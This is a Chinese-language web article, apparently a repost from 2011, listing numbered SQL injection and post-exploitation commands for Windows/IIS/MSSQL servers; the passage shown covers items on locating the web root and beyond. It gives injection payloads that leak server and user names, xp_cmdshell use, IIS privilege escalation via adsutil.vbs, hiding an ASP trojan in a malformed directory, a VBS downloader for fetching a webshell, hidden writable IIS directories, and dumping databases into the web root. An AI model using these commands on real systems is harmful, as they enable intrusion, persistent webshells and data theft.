比較全的SQL注入相關的命令分享
作者: 來源: 發(fā)布時間:2011-6-15 15:18:23 點擊:
現(xiàn)在,我們用同樣的方法判斷該目錄是否為根目錄:
and (select count(*) from temp2 where dir<>'user')<(select count(*) from temp2)
如果返回為真,為了確定我們的判斷,多測試幾個例子,方法上面都講到了,如果多個例子都返回為真,那么就確定了該目錄為WEB根目錄。
用以上的方法基本上可以獲得WEB根目錄,現(xiàn)在我們假設WEB根目錄是:D:\website\www
然后,我們就可以備份當前數(shù)據(jù)庫到這個目錄下用來下載。備份前我們把temp、temp1、temp2的內(nèi)容清空,然后C、D、E盤的目錄樹分別存到temp、temp1、temp2中。
下載完數(shù)據(jù)庫后要記得把三個臨時表DROP掉,現(xiàn)在我們在下載的數(shù)據(jù)庫中可以找到所有的目錄列表,包括后臺管理的目錄以及更多信息。
21、win2000下將WEB用戶提升為系統(tǒng)用戶權限,需要有管理員的權限才能執(zhí)行:
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll" "C:\winnt\system32\inetsrv\asp.dll"
cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\windows\system32\idq.dll" "C:\windows\system32\inetsrv\httpext.dll" "C:\windows\system32\inetsrv\httpodbc.dll" "C:\windows\system32\inetsrv\ssinc.dll" "C:\windows\system32\msw3prt.dll" "C:\windows\system32\inetsrv\asp.dll"
查看是否成功:
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps
Microsoft (R) Windows Script Host Version 5.6
版權所有(C) Microsoft Corporation 1996-2001。保留所有權利。
inprocessisapiapps : (LIST) (6 Items)
"C:\WINNT\system32\idq.dll"
"C:\WINNT\system32\inetsrv\httpext.dll"
"C:\WINNT\system32\inetsrv\httpodbc.dll"
"C:\WINNT\system32\inetsrv\ssinc.dll"
"C:\WINNT\system32\msw3prt.dll"
"c:\winnt\system32\inetsrv\asp.dll"
22、如何隱藏ASP木馬:
建立非標準目錄:mkdir images..\
拷貝ASP木馬至目錄:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
通過web訪問ASP木馬:http://ip/images../news.asp?action=login
如何刪除非標準目錄:rmdir images..\ /s
23、去掉tenlnet的ntlm認證:
;exec master.dbo.xp_cmdshell 'tlntadmn config sec = -ntlm'—
24、用echo寫入文件下載腳本iget.vbs:
(1)echo Set x= CreateObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = CreateObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\iget.vbs
(2)c:\>cscript iget.vbs http://127.0.0.1/asp/dbm6.asp dbm6.asp
25、手工建立IIS隱藏目錄的方法:
查看本地虛擬目錄列表:cscript.exe c:\inetpub\AdminScripts\adsutil.vbs enum w3svc/1/root
新建一個kiss目錄:mkdir c:\asp\kiss
建立kiss虛擬目錄:cscript.exe c:\inetpub\AdminScripts\mkwebdir.vbs -c MyComputer -w "Default Web Site" -v "kiss","c:\asp\kiss"
為kiss目錄加執(zhí)行和寫權限:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/kiss/accesswrite "true" -s:
cscript.exe c:\inetpub\AdminScripts\adsutil.vbs set w3svc/1/root/kiss/accessexecute "true" -s:
?:Cscript c:\inetpub\AdminScripts\adsutil.vbs set /w3svc/1/root/kiss/createprocessasuser false
訪問:http://127.0.0.1/kiss/test.asp
26、使用openrowset()連回本地做測試:
SELECT a.*
FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]') AS a
SELECT * FROM OPENROWSET('SQLOLEDB','127.0.0.1';'sa';'111111',
'SELECT * FROM [dvbbs].[dbo].[dv_admin]')
27、獲得主機名:
http://www.xxxx.com/FullStory.asp?id=1 and 1=convert(int,@@servername)--
select convert(int,@@servername)
select @@servername
28、獲得數(shù)據(jù)庫用戶名:
http://www.XXXX.com/FullStory.asp?id=1 and 1=convert(int,system_user)--
http://www.19cn.com/showdetail.asp?id=49 and user>0
select user
29、普通用戶獲得WEBSHELL的方法之二:
打包:
EXEC [master].[dbo].[xp_makecab] 'c:\test.rar','default',1,'d:\cmd.asp'
解包,可以用于得到webshell:
EXEC [master].[dbo].[xp_unpackcab] 'C:\test.rar','c:',1, 'n.asp'
讀任意文件內(nèi)容,要求有master的dbo權限:
EXEC [master].[dbo].[xp_readerrorlog] 1,'c:\cmd.asp'
30、sa 權限下已知web路徑直接備份數(shù)據(jù)庫到web路徑下
http://www.XXXX.com/FullStory.asp?id=1;backuup database 數(shù)據(jù)庫名 to disk='c:\inetpub\wwwroot\save.db' 則把得到的數(shù)據(jù)內(nèi)容全部備份到WEB目錄下,再用HTTP把此文件下載(當然首選要知道WEB虛擬目錄)。
Tags:
比較全的SQL注入相關的命令分享[收藏此文章]